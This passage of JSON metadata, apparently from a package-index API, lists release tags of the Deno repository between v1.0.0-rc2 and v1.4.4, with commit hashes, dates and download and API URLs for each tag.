ifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.g